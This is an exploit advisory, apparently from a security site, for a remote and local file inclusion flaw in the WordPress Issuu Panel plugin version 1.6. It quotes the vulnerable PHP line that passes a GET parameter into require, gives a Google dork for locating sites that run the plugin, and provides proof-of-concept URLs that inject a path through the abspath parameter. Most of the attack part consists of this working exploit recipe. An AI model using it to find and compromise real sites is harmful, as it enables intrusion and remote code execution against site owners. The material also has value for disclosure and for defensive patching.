WordPress Issuu Panel 1.6 Remote / Local File Inclusion

2016.03.24
Credit: CrashBandicot
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Wordpress Plugin Issuu Panel - RFI & LFI # Exploit Author: CrashBandicot # Date: 2016-03-23 # Google Dork : inurl:/wp-content/plugins/issuu-panel/ # Vendor Homepage: https://wordpress.org/plugins/issuu-panel/ # Tested on: MsWIn # Version: 1.6 # Vulnerable File : menu/documento/requests/ajax-docs.php 3. require($_GET['abspath'] . '/wp-load.php'); # PoC : http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[RFI] http://127.0.0.1/wordpress/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=[LFI]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top